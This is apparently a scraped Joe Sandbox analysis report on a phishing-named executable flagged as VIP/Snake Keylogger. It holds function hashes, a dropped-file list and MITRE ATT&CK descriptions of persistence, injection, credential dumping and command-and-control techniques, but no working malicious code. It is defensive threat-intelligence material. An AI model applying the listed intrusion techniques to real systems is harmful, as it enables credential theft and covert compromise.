Instruction Fuzzy Hash: 161190B4D0020A8FCF44EFA9D9845EEBBF4FF49301F10556AD805B2264EB305A95CFA1

Function 02699D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e368b1e3ff3eef2ea4dca5f177e564f146b69e92011af0e7e804ee7fb98e96af
Instruction ID: a8ade826d88c069803a5e0b336c372ca91f38a7f7f9e033f06495cc0deb5f0ce
Opcode Fuzzy Hash: e368b1e3ff3eef2ea4dca5f177e564f146b69e92011af0e7e804ee7fb98e96af
Instruction Fuzzy Hash: 1DF068353016146FDB091AA998509BFBBDFEBCC3A1B14443DB949C7391DE71CC5187A0

Function 0269F71F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248b14047dd5526bcab2ebf9786b0c287d56819698c22de2006655821e857c0e
Instruction ID: b436a624e91cf64922febc8e6c8fed6d9b0afae7ecd479510c06e196ba270fcd
Opcode Fuzzy Hash: 248b14047dd5526bcab2ebf9786b0c287d56819698c22de2006655821e857c0e
Instruction Fuzzy Hash: AA01D6B4A006098FEF10DF59D88465EFBF1FF86304B05C5AAC1449B131DB74940ACF52

Function 0269E8FB Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0704e9b7fbe4dde8b7c64f06af158ae59dfa775f16a4ea4ef333ea48926e79f2
Instruction ID: e3dbbb7eb870a96c4cbb762903026c851a2ef6e8e316ef0bb7e46b58cd93d742
Opcode Fuzzy Hash: 0704e9b7fbe4dde8b7c64f06af158ae59dfa775f16a4ea4ef333ea48926e79f2
Instruction Fuzzy Hash: AE014B78D0020ADFCF40DFA8D844AAEBBB1FB49300F0085A6D910B3354D7755A55DF80

Function 02699C2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2162e9496e4ea7ed0c8587f4969c627ed121ab64755504214efd0dbe8ad705
Instruction ID: 3169972061d8f2bf1d7e48cd89cfbf4de361f08196da649988bd6dc9baff0409
Opcode Fuzzy Hash: 0e2162e9496e4ea7ed0c8587f4969c627ed121ab64755504214efd0dbe8ad705
Instruction Fuzzy Hash: 81F08275A00118DFCF108F699844AEEBBB6EBC8335F00C126E918C7254D7314915CB50

Function 0269AF64 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47a57b89dd7a3b4df6e62a58034306396998d57e2271b3172711906aef89bb26
Instruction ID: 3f3e79b8f35ad494fcb0d559b63febcc421037f7616981c2d4664a4c2392081e
Opcode Fuzzy Hash: 47a57b89dd7a3b4df6e62a58034306396998d57e2271b3172711906aef89bb26
Instruction Fuzzy Hash: 6CE0C97A740104AFCB008E84DC41FDDFBB6FB8C711F144155FA15A72A0C631A821CB50

Function 026928A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd56dbcb74184b162fdad07c700839620628399c8e0a6ea0b2c43b141bf89d4
Instruction ID: 0db1e0a1bfa09b1fc336f50fa29e578e8d1773bd7b599ad1b667439b6d0ea25a
Opcode Fuzzy Hash: 5fd56dbcb74184b162fdad07c700839620628399c8e0a6ea0b2c43b141bf89d4
Instruction Fuzzy Hash: 43E0DF36D203268AD702A7A098400EEBB34AE96321B14465BC06132081EB30224A87A1

Function 026928B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7575cf817e7673fed55cf60d365b6f42f47708aca5277e301eab0a63facce96
Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
Opcode Fuzzy Hash: f7575cf817e7673fed55cf60d365b6f42f47708aca5277e301eab0a63facce96
Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1

Function 02696739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea1c07d3e24954bc89dac15fa8c971b29415e8993dd8d52974e3a6ee62c513b
Instruction ID: 570f45d0c029ccf5244e90dfc7da5899432e42f80614da848ea2b7b5b58854e6
Opcode Fuzzy Hash: cea1c07d3e24954bc89dac15fa8c971b29415e8993dd8d52974e3a6ee62c513b
Instruction Fuzzy Hash: F6E05E3444D3448FD742B7B4F8884153FB3BF86600B15DAA5E0845F6AEEE75982ACB62

Function 02698EF7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
Instruction ID: e06e79601da69dd6822ac111f525cac3ece3dda4e78eff58062ac89125e3ae96
Opcode Fuzzy Hash: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
Instruction Fuzzy Hash: 86C0127360C0642DAB39006E3C81BFBAB5EC3C23F4A25127BF99CE32009C424C8282A4

Function 0269D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab449cc7de1a5fddbc6f31f46daf8d240eca52a9fb6337e87d8cafec7e6418e
Instruction ID: 3bfdf0e55dce1bcc0f9e34ce7309d28a7dc97457fd0ece920bd4f74823f6d9d5
Opcode Fuzzy Hash: 0ab449cc7de1a5fddbc6f31f46daf8d240eca52a9fb6337e87d8cafec7e6418e
Instruction Fuzzy Hash: DFD01739E4020CCBCF24DFA8E4944DCFB71EF49321F20542ADA25A3250C6301421CF01

Function 0269AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5622dce56feddfb46a298f0cad8d93a47fbf22422f5c0b04508d94c2c1180771
Instruction ID: 7ff7942a281d99c778746817b107d1576800deed7f3a7d40cc80ec67def23359
Opcode Fuzzy Hash: 5622dce56feddfb46a298f0cad8d93a47fbf22422f5c0b04508d94c2c1180771
Instruction Fuzzy Hash: 31D0673AB40108EFDB049F98E8809DDF776FB98221B048526E915A3264C631A965DB54

Function 02696748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3828666135.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2690000_NuDUTBObHpKADz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9076f8720cd402cef70b2b0344a1a17a5b5b530e0cc54109459a9cd95a959436
Instruction ID: 50d76619d152a82f266b7b443440d3361180912ca48ff15a4021ed58f9ebf019
Opcode Fuzzy Hash: 9076f8720cd402cef70b2b0344a1a17a5b5b530e0cc54109459a9cd95a959436
Instruction Fuzzy Hash: 55C08C304007084FD645F772FD8A919336EAAC0E04B40DA60F00D2A68EFFF8AD664B91

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NuDUTBObHpKADz.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b2vosgo.bzw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5oe0ovcw.jm2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnvrsnpm.5ur.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_comoq3s5.21l.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2n0pgpb.g35.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toifkqrq.u0w.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuxqlhhe.pme.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5cygng0.es0.psm1

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre